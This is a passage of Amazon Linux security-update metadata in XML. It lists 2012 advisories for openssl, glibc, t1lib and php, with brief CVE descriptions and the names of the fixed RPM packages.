version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysqlnd-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-odbc" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-odbc-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-mbstring" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mbstring-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-pspell" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pspell-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-pdo" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pdo-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-tidy" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-tidy-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-dba" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-dba-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-gd" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-gd-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-fpm" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-fpm-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-cli" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-cli-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-devel" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-devel-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-mysql" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysql-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-mssql" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mssql-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-xmlrpc" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xmlrpc-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-process" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-process-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-bcmath" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-bcmath-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-snmp" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-snmp-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-common" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-common-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-imap" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-imap-5.3.9-1.9.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-38</id><title>Amazon Linux - ALAS-2012-38: medium priority package update for openssl</title><issued date="2012-02-02 14:24:00" /><updated date="2014-09-14 15:14:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4619:
The Server Gated Cryptography (SGC) implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly handle handshake restarts, which allows remote attackers to cause a denial of service via unspecified vectors.
It was discovered that OpenSSL did not limit the number of TLS/SSL handshake restarts required to support Server Gated Cryptography. A remote attacker could use this flaw to make a TLS/SSL server using OpenSSL consume an excessive amount of CPU by continuously restarting the handshake.
CVE-2011-4577:
OpenSSL before 0.9.8s and 1.x before 1.0.0f, when RFC 3779 support is enabled, allows remote attackers to cause a denial of service (assertion failure) via an X.509 certificate containing certificate-extension data associated with (1) IP address blocks or (2) Autonomous System (AS) identifiers.
A denial of service flaw was found in the RFC 3779 implementation in OpenSSL. A remote attacker could use this flaw to make an application using OpenSSL exit unexpectedly by providing a specially-crafted X.509 certificate that has malformed RFC 3779 extension data.
CVE-2011-4576:
The SSL 3.0 implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly initialize data structures for block cipher padding, which might allow remote attackers to obtain sensitive information by decrypting the padding data sent by an SSL peer.
An information leak flaw was found in the SSL 3.0 protocol implementation in OpenSSL. Incorrect initialization of SSL record padding bytes could cause an SSL client or server to send a limited amount of possibly sensitive data to its SSL peer via the encrypted connection.
CVE-2011-4108:
The DTLS implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack.
It was discovered that the Datagram Transport Layer Security (DTLS) protocol implementation in OpenSSL leaked timing information when performing certain operations. A remote attacker could possibly use this flaw to retrieve plain text from the encrypted packets by using a DTLS server as a padding oracle.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4108" title="" id="CVE-2011-4108" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4576" title="" id="CVE-2011-4576" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4577" title="" id="CVE-2011-4577" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4619" title="" id="CVE-2011-4619" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0059.html" title="" id="RHSA-2012:0059" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="openssl" version="1.0.0g" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-1.0.0g-1.26.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.0g" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-perl-1.0.0g-1.26.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.0g" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-devel-1.0.0g-1.26.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.0g" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-debuginfo-1.0.0g-1.26.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.0g" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-static-1.0.0g-1.26.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.0g" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-static-1.0.0g-1.26.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.0g" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.0g-1.26.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.0g" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-devel-1.0.0g-1.26.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.0g" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-perl-1.0.0g-1.26.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.0g" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-1.0.0g-1.26.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-39</id><title>Amazon Linux - ALAS-2012-39: medium priority package update for glibc</title><issued date="2012-02-02 14:26:00" /><updated date="2014-09-14 15:14:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4609:
A denial of service flaw was found in the remote procedure call (RPC) implementation in glibc. A remote attacker able to open a large number of connections to an RPC service that is using the RPC implementation from glibc, could use this flaw to make that service use an excessive amount of CPU time.
CVE-2009-5029:
An integer overflow flaw, leading to a heap-based buffer overflow, was found in the way the glibc library read timezone files. If a carefully-crafted timezone file was loaded by an application linked against glibc, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-5029" title="" id="CVE-2009-5029" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4609" title="" id="CVE-2011-4609" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0058.html" title="" id="RHSA-2012:0058" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="glibc-debuginfo-common" version="2.12" release="1.47.32.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.12-1.47.32.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.12" release="1.47.32.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.12-1.47.32.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.12" release="1.47.32.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.12-1.47.32.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.12" release="1.47.32.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.12-1.47.32.amzn1.i686.rpm</filename></package><package name="glibc" version="2.12" release="1.47.32.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.12-1.47.32.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.12" release="1.47.32.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.12-1.47.32.amzn1.i686.rpm</filename></package><package name="nscd" version="2.12" release="1.47.32.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.12-1.47.32.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.12" release="1.47.32.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.12-1.47.32.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.12" release="1.47.32.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.12-1.47.32.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.12" release="1.47.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.12-1.47.32.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.12" release="1.47.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.12-1.47.32.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.12" release="1.47.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.12-1.47.32.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.12" release="1.47.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.12-1.47.32.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.12" release="1.47.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.12-1.47.32.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.12" release="1.47.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.12-1.47.32.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.12" release="1.47.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.12-1.47.32.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.12" release="1.47.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.12-1.47.32.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.12" release="1.47.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.12-1.47.32.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-40</id><title>Amazon Linux - ALAS-2012-40: medium priority package update for t1lib</title><issued date="2012-02-02 14:26:00" /><updated date="2014-09-14 15:15:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-1554:
Off-by-one error in t1lib 5.1.2 and earlier, as used in Xpdf before 3.02pl6 and other products, allows remote attackers to cause a denial of service (application crash) via a PDF document containing a crafted Type 1 font that triggers an invalid memory read, integer overflow, and invalid pointer dereference, a different vulnerability than CVE-2011-0764.
An off-by-one flaw was found in t1lib. A specially-crafted font file could, when opened, cause teTeX to crash or, potentially, execute arbitrary code with the privileges of the user running teTeX.
An off-by-one flaw was found in t1lib. A specially-crafted font file could, when opened, cause an application linked against t1lib to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
An off-by-one flaw was found in t1lib. A specially-crafted font file could, when opened, cause a TeX Live utility to crash or, potentially, execute arbitrary code with the privileges of the user running the utility.
CVE-2011-1553:
Use-after-free vulnerability in t1lib 5.1.2 and earlier, as used in Xpdf before 3.02pl6 and other products, allows remote attackers to cause a denial of service (application crash) via a PDF document containing a crafted Type 1 font that triggers an invalid memory write, a different vulnerability than CVE-2011-0764.
A use-after-free flaw was found in t1lib. A specially-crafted font file could, when opened, cause teTeX to crash or, potentially, execute arbitrary code with the privileges of the user running teTeX.
A use-after-free flaw was found in t1lib. A specially-crafted font file could, when opened, cause an application linked against t1lib to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
A use-after-free flaw was found in t1lib. A specially-crafted font file could, when opened, cause a TeX Live utility to crash or, potentially, execute arbitrary code with the privileges of the user running the utility.
CVE-2011-1552:
t1lib 5.1.2 and earlier, as used in Xpdf before 3.02pl6 and other products, reads from invalid memory locations, which allows remote attackers to cause a denial of service (application crash) via a crafted Type 1 font in a PDF document, a different vulnerability than CVE-2011-0764.
An out-of-bounds memory read flaw was found in t1lib. A specially-crafted font file could, when opened, cause teTeX to crash.
An out-of-bounds memory read flaw was found in t1lib. A specially-crafted font file could, when opened, cause an application linked against t1lib to crash.
An out-of-bounds memory read flaw was found in t1lib. A specially-crafted font file could, when opened, cause a TeX Live utility to crash.
CVE-2011-0764:
t1lib 5.1.2 and earlier, as used in Xpdf before 3.02pl6 and other products, uses an invalid pointer in conjunction with a dereference operation, which allows remote attackers to execute arbitrary code via a crafted Type 1 font in a PDF document, as demonstrated by testz.2184122398.pdf.
An invalid pointer dereference flaw was found in t1lib. A specially-crafted font file could, when opened, cause teTeX to crash or, potentially, execute arbitrary code with the privileges of the user running teTeX.
An invalid pointer dereference flaw was found in t1lib. A specially-crafted font file could, when opened, cause an application linked against t1lib to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
An invalid pointer dereference flaw was found in t1lib. A specially-crafted font file could, when opened, cause a TeX Live utility to crash or, potentially, execute arbitrary code with the privileges of the user running the utility.
CVE-2010-2642:
Two heap-based buffer overflow flaws were found in the way t1lib processed Adobe Font Metrics (AFM) files. If a specially-crafted font file was opened by teTeX, it could cause teTeX to crash or, potentially, execute arbitrary code with the privileges of the user running teTeX.
Two heap-based buffer overflow flaws were found in the way t1lib processed Adobe Font Metrics (AFM) files. If a specially-crafted font file was opened by an application linked against t1lib, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
Two heap-based buffer overflow flaws were found in the way t1lib processed Adobe Font Metrics (AFM) files. If a specially-crafted font file was opened by a TeX Live utility, it could cause the utility to crash or, potentially, execute arbitrary code with the privileges of the user running the utility.
Heap-based buffer overflow in the AFM font parser in the dvi-backend component in Evince 2.32 and earlier, teTeX 3.0, t1lib 5.1.2, and possibly other products allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted font in conjunction with a DVI file that is processed by the thumbnailer.
A heap-based buffer overflow flaw was found in the DVI renderer's AFM font file parser. A DVI file that references a specially-crafted font file could, when opened, cause Evince to crash or, potentially, execute arbitrary code with the privileges of the user running Evince.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2642" title="" id="CVE-2010-2642" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0764" title="" id="CVE-2011-0764" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1552" title="" id="CVE-2011-1552" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1553" title="" id="CVE-2011-1553" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1554" title="" id="CVE-2011-1554" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0062.html" title="" id="RHSA-2012:0062" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="t1lib-debuginfo" version="5.1.2" release="6.5.amzn1" epoch="0" arch="i686"><filename>Packages/t1lib-debuginfo-5.1.2-6.5.amzn1.i686.rpm</filename></package><package name="t1lib" version="5.1.2" release="6.5.amzn1" epoch="0" arch="i686"><filename>Packages/t1lib-5.1.2-6.5.amzn1.i686.rpm</filename></package><package name="t1lib-static" version="5.1.2" release="6.5.amzn1" epoch="0" arch="i686"><filename>Packages/t1lib-static-5.1.2-6.5.amzn1.i686.rpm</filename></package><package name="t1lib-devel" version="5.1.2" release="6.5.amzn1" epoch="0" arch="i686"><filename>Packages/t1lib-devel-5.1.2-6.5.amzn1.i686.rpm</filename></package><package name="t1lib-apps" version="5.1.2" release="6.5.amzn1" epoch="0" arch="i686"><filename>Packages/t1lib-apps-5.1.2-6.5.amzn1.i686.rpm</filename></package><package name="t1lib-static" version="5.1.2" release="6.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/t1lib-static-5.1.2-6.5.amzn1.x86_64.rpm</filename></package><package name="t1lib-debuginfo" version="5.1.2" release="6.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/t1lib-debuginfo-5.1.2-6.5.amzn1.x86_64.rpm</filename></package><package name="t1lib-apps" version="5.1.2" release="6.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/t1lib-apps-5.1.2-6.5.amzn1.x86_64.rpm</filename></package><package name="t1lib-devel" version="5.1.2" release="6.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/t1lib-devel-5.1.2-6.5.amzn1.x86_64.rpm</filename></package><package name="t1lib" version="5.1.2" release="6.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/t1lib-5.1.2-6.5.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-41</id><title>Amazon Linux - ALAS-2012-41: critical priority package update for php</title><issued date="2012-02-02 16:10:00" /><updated date="2014-09-14 15:16:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0830:
The php_register_variable_ex function in php_variables.c in PHP 5.3.9 allows remote attackers to execute arbitrary code via a request containing a large number of variables, related to improper handling of array variables. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-4885.
It was discovered that the fix for CVE-2011-4885 (released via RHSA-2012:0071, RHSA-2012:0033, and RHSA-2012:0019 for php packages in Red Hat Enterprise Linux 4, 5, and 6 respectively) introduced an uninitialized memory use flaw. A remote attacker could send a specially-crafted HTTP request to cause the PHP interpreter to crash or, possibly, execute arbitrary code.
It was discovered that the fix for CVE-2011-4885 (released via RHSA-2012:0019 for php53 packages in Red Hat Enterprise Linux 5) introduced an uninitialized memory use flaw. A remote attacker could send a specially- crafted HTTP request to cause the PHP interpreter to crash or, possibly, execute arbitrary code.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0830" title="" id="CVE-2012-0830" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0093.html" title="" id="RHSA-2012:0093" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="php-pgsql" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-pgsql-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-mbstring" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-mbstring-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-pdo" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-pdo-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-mcrypt" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-mcrypt-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-mysqlnd" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysqlnd-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-mysql" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysql-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-snmp" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-snmp-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-odbc" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-odbc-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-intl" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-intl-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-bcmath" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-bcmath-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-soap" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-soap-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-imap" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-imap-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-debuginfo" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-debuginfo-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-cli" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-cli-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-dba" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-dba-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-embedded" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-embedded-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-mssql" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-mssql-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-process" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-process-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-ldap" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-ldap-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-tidy" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-tidy-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-common" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-common-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-devel" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-devel-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-xmlrpc" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-xmlrpc-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-xml" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-xml-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-gd" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-gd-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-fpm" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-fpm-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-pspell" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-pspell-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-pspell" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pspell-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-imap" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-imap-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-tidy" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-tidy-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-pdo" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pdo-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-process" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-process-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-xml" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xml-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-pgsql" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pgsql-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-mbstring" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mbstring-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-soap" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-soap-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-cli" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-cli-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-debuginfo" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-debuginfo-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-mysql" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysql-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-common" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-common-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-odbc" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-odbc-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-bcmath" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-bcmath-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-gd" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-gd-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-dba" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-dba-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-intl" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-intl-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-ldap" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-ldap-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-embedded" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-embedded-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-mcrypt" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mcrypt-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-snmp" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-snmp-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-devel" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-devel-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-fpm" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-fpm-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-xmlrpc" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xmlrpc-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-mssql" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mssql-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-mysqlnd" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysqlnd-5.3.10-1.15.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-42</id><title>Amazon Linux - ALAS-2012-42: medium priority package update for ghostscript</title><issued date="2012-02-08 13:46:00" /><updated date="2014-09-14 15:18:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2010-4820:
